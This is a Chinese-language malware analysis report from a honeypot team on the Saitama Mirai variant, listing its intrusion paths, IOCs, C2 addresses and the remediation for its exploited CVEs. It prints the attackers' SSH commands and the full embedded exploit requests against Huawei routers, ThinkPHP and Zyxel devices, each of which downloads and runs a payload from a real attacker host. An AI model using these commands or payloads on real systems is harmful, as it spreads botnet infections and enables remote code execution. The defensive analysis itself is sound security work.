简述

Saitama样本为Mirai变体,主要利用RCE漏洞传播构建僵尸网络并进行DDos攻击。Saitama样本作为Mirai变体,会感染大量IoT设备,并向指定目标发起DDos攻击,利用RCE漏洞进行传播,并容易导致网络瘫痪。

elkeid 样本ID

  • elkeid_20220424_botnet_2

捕获时间

  • 20220424

最近活跃时间

  • 20221118

已知入侵途径

  • 弱口令爆破
  • RCE利用

涉及样本

执行目录

  • /tmp
  • /var/run
  • /mnt
  • /root
  • /

样本

  • Saitama.sh
  • tSaitama.sh
  • tSaitama2.sh
  • Saitama1.sh
  • Mirai
  • Saitama121.x86
  • Saitama121.ppc
  • Saitama121.mpsl

主要行为

  • ssh行为

    • bash -c yum install wget -y;
    • bash -c cd /tmp cd /var/run cd /mnt cd /root cd /;
    • wget http://2.56.59.196/Saitama.sh;
    • curl -O http://2.56.59.196/Saitama.sh;
    • chmod 777 Saitama.sh;
    • sh Saitama.sh;
    • tftp 2.56.59.196 -c get tSaitama.sh;
    • chmod 777 tSaitama.sh;
    • sh tSaitama.sh; tftp -r tSaitama2.sh -g 2.56.59.196; chmod 777 tSaitama2.sh; sh tSaitama2.sh; ftpget -v -u anonymous -p anonymous -P 21 2.56.59.196 Saitama1.sh Saitama1.sh; sh Saitama1.sh; rm -rf Saitama.sh tSaitama.sh tSaitama2.sh Saitama1.sh; rm -rf *

  • 启动脚本行为

    • 下载恶意文件

      • cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://2.56.59.196/bins/Saitama121.x86; curl -O http://2.56.59.196/bins/Saitama121.x86;

    • 恶意文件重命名

      • cat Saitama121.x86 >cp;

    • 赋权与执行

      • chmod 777 *;./cp ssh

  • 恶意文件行为

    • Setsid
    • 向大量ip地址的80端口与37215端口发送POST/GET请求

IOC

URLsha256
http://2.56.59.196/bins/Saitama121.spcSaitama121.spc:8640212124000fd6a88e4147c49e09e681aaead8c9b6756215f7ff2271d4b6cc
http://2.56.59.196/bins//Saitama121.arm7Saitama121.arm7:192ac3d719930d52b3a2923bdcb18ff88eb58644afe7f20fda5c578c4c08e812
http://2.56.59.196/bins/Saitama121.sh4Saitama121.sh4: 822476f603a7c8b26a426fae3d4463509eebaa714a116ab02260a4af8de8a27d
http://2.56.59.196/bins/Saitama121.m68kSaitama121.m68k:b6be4529f5ad301a331aaf7b37b455e48c8d14204ede8d34f41159d7cf19240b
http://2.56.59.196/bins/Saitama121.mpslSaitama121.mpsl:fdec1f038fdba45ba380ebeb970c30203afffd4862dc7e51080c542ea6e0dcee
http://2.56.59.196/bins/Saitama121.arm6Saitama121.arm6:b3323a5bba07180281870cd79e77f69a2d8b448d81af5c84ad145b73c33d3b34
http://2.56.59.196/bins/Saitama121.ppcSaitama121.ppc:2905d677ad42d8690e9dbad8daa5cc51fa77b9a43d7065121e626c52de283243
http://2.56.59.196/bins/Saitama121.x86Saitama121.x86:2835029b31d5f674c0ac48da199aedd2dce59e5d4814ca5c4041ca86213144df|
http://2.56.59.196/bins/Saitama121.mipsSaitama121.mips:2497439848f5a3ca782f66342b8becf7d6f60ef436683e648b7df4c87fc3dc13
http://2.56.59.196/bins/Saitama121.arm5Saitama121.arm5:e389702b7194c5c62d0cf23617cd54694f97dd25ca6fccd1daa19f0eee08746a
Saitama.sh:a30ff63dc4951d23a690906117e0ce4516d3710ca68cd4c1cc1b2f69bfbf36b2
Saitama121.arm:920b5dc483b4d0773bbc753f190dba5384f5683f85a719d70da16013cc6ab2f1

已知情报

  • https://maltiverse.com/ip/2.56.59.196
  • https://www.virustotal.com/gui/url/ad3ca5bff5558c8165c237c85ff43b5c0ce19c2c82687295f8af2c0637211509
  • 与Mirai关联

二进制行为分析(沙箱执行结果)

文件云查杀结果

Saitama121.x86:2835029b31d5f674c0ac48da199aedd2dce59e5d4814ca5c4041ca86213144df

https://internal only/search/result/2835029b31d5f674c0ac48da199aedd2dce59e5d4814ca5c4041ca86213144df

sandbox任务:

{

            "task_id": "mj_2835029b31d5f674c0ac48da199aedd2dce59e5d4814ca5c4041ca86213144df_test",
            "init_script": "`internal only`",
            "desc": "",
            "files": {
                "Saitama121.x86": "2835029b31d5f674c0ac48da199aedd2dce59e5d4814ca5c4041ca86213144df"
            },
            "url": "https://`internal only`/obj/eden-cn/ubqnpieh7ubqht/malware/",
            "path": "/var/tmp",
            "timeout": 30,
            "task_timeout": 10,
            "recursive": false,
            "task_type": "malware",
            "callback": ""
}

样本变体

不同来源的Saitama.sh

样本sha256区别Honeypot捕获
http://136.144.41.55/Saitama.sh977bba207cafa8ad195c7b3c23411bb514dcec5dfc1367e07f1adb5a6672430fip: 136.144.41.55样本启动参数: ./cp x86, ./cp mips, ./cp arm, ......
http://2.56.59.196/Saitama.sha30ff63dc4951d23a690906117e0ce4516d3710ca68cd4c1cc1b2f69bfbf36b2ip: 2.56.59.196样本启动参数: ./cp ssh

不同文件名的启动脚本

样本sha256区别Honeypot捕获
http://136.144.41.55/wget.shbaebca2e198f7371a9b28d71cbee57009188c857b62d0143400aa113a8cb316d样本启动参数: ./cp exploit.multi
http://136.144.41.55/Saitama.sh977bba207cafa8ad195c7b3c23411bb514dcec5dfc1367e07f1adb5a6672430f样本启动参数: ./cp x86, ./cp mips, ./cp arm, ......
http://2.56.59.196/multiuwu.sh3320cfed5e6e7edef694ef5c92bd913fff3aeb1525d8b77dcec1048b14e85846暂无样本

不同后缀的saitama elf文件对比

通过查看strings及行为报告可知,不同后缀的saitama elf文件功能一致,适配不同平台。

不同ip来源的saitama.x86对比

仅硬编码的ip地址不同,如下

样本sha256区别Honeypot捕获
http://136.144.41.55/bins/Saitama121.x86afa21c242fa6af1dd5fac9f5c02eddedb73bb134fbba560a77a6b61799eea463硬编码的C2地址为136.144.41.55
http://2.56.59.196/bins/Saitama121.x862835029b31d5f674c0ac48da199aedd2dce59e5d4814ca5c4041ca86213144df硬编码的C2地址为2.56.59.196

历史来源与关联组织

作为主要感染物联网设备构建僵尸网络的Mirai变体,Saitama121.* 的strings同样存在在已在多种Mirai样本中出现的特征字符

Self Rep Fucking NeTiS and Thisity 0n Ur FuCkInG FoReHeAd We BiG L33T HaxErS

,但相比于部分存在作者签名的Mirai样本,elkeid honeypot此次捕获的所有样本中并没有明确的作者信息。在https://www.malwarebytes.com/blog/threat-intelligence/2022/05/apt34-targets-jordan-government-using-new-saitama-backdoor报道了来自伊朗APT组织APT34的同名恶意文件——saitama后门,尚不确定与本样本是否存在关联。

样本静态分析

通过样本strings发现该样本携带3种RCE漏洞进行利用,分别为:

  • 针对华为家用路由器的CVE-2017-17215

  • 针对ThinkPHP的CVE-2018-20062

  • 针对Zyxel的CVE-2017-18368

样本strings包含

POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 193.239.147.201 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

,其中HuaweiHomeGateway表明该样本针对华为家用路由器,同时样本行为中对大量ip的37215端口发起请求也可以印证。一旦RCE漏洞利用成功, 即执行/bin/busybox wget -g 193.239.147.201 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips,推测下载执行的文件同样为Mirai样本。

样本strings包含

GET /index.php?s=/index/
hink
pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: Uirusu/2.0

,表明样本可进行thinkphp的RCE漏洞利用,此外特殊的User-Agent(Uirusu/2.0)也在许多针对Nginx代理服务器的僵尸网络攻击中出现。

样本strings包含

POST /cgi-bin/ViewLog.asp HTTP/1.1
Host: 192.168.0.14:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.0
Content-Length: 227
Content-Type: application/x-www-form-urlencoded
 /bin/busybox wget http://193.239.147.201/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

表明样本可进行zyxel相关网络设备的RCE漏洞利用。

安全配置建议

  • 梳理资产信息,修复CVE-2017-17215、CVE-2018-20062和CVE-2017-18368等相关系统漏洞

  • 不使用弱密码或默认密码

参考链接

https://cujo.com/mirai-gafgyt-with-new-ddos-modules-discovered/

https://www.radware.com/security/ddos-threats-attacks/threat-advisories-attack-reports/hoaxcalls-evolution/

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17215

https://github.com/lcashdol/Exploits/blob/master/HuaweiHomeDeviceUpgrade.txt

https://www.reddit.com/r/selfhosted/comments/kxiq7y/possible_botnet_targeting_nginx_proxy_manager/

http://blog.nsfocus.net/ryuk-botnet/